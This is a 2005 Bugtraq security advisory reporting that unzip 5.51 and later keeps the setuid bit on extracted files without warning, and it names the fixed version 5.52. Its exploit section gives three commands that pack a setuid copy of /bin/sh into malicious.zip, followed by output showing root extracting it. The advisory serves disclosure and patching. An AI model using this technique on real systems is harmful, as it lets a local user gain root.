7a69Adv#22 - UNIX unzip keep setuid and setgid files

From: Albert Puigsech Galicia (ripe_at_7a69ezine.org)
Date: 02/28/05

  • Next message: Rainer Schöpf: "Re: iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability" 
    Date: Mon, 28 Feb 2005 13:17:02 +0000
To: bugtraq@securityfocus.com

    - ------------------------------------------------------------------
           7a69ezine Advisories 7a69Adv#22
    - ------------------------------------------------------------------
      http://www.7a69ezine.org [26/01/2005]
    - ------------------------------------------------------------------

    Title: Unzip keep setuid and setgid files

    Author: Albert Puigsech Galicia - <ripe@7a69ezine.org>

    Software: Unzip

    Versions: >= 5.51

    Remote: No

    Exploit: yes

    Severity: Low/Medium

    - ------------------------------------------------------------------

    I. Introduction.

     UnZip is an extraction utility for archives compressed in .zip format. It's
    compatible with PKWARE's PKZIP and PKUNZIP utilities for MS-DOS. The primary
    objectives have been portability and non-MSDOS fuctionality. More info about
    unzip on http://www.info-zip.org/pub/infozip/UnZip.html.

    II. Description.

     The unzip UNIX functionality allow you to maintain file permisions into
    compressed files, and of course that includes the setuid bit. Because it does
    not show a warning message before unpacking a setuid file is posible to create
    a malicious ZIP file that creates an executable setuid.

    III. Exploit

     It's realy easy to test this vulnerability. You can create a malicious ZIP
    file following this example:

     $ cp /bin/sh .
     $ chmod 4777 sh
     $ zip malicious.zip sh

     When another user (including root) unpacks the file, a setuid shell file will
    be created without any warning, as you can see here:

     # id
     # unzip malicious.zip
     Archive: malicious.zip
      inflating: sh
     # ls -l sh
     -rwsrwxrwx 1 root root 705148 Jan 16 17:04 sh

     Of course ye need a local account on the system to execute the file, so it's
    not a remote vulnerability.

    IV. Patch

            Upgrade to unzip 5.52.
     

    V. Timeline

    12/01/2005 - Bug discovered
    16/01/2005 - Vendor contacted
    21/01/2005 - Vendor response
    25/01/2005 - Vendor patch provided
    28/02/2005 - New versión published
    28/02/2005 - Advisor published

    VI. Extra data

     You can find more 7a69ezine advisories on this following link:

        http://www.7a69ezine.org/avisos/propios [spanish info]

  • Next message: Rainer Schöpf: "Re: iDEFENSE Security Advisory 02.25.05: WU-FTPD File Globbing Denial of Service Vulnerability"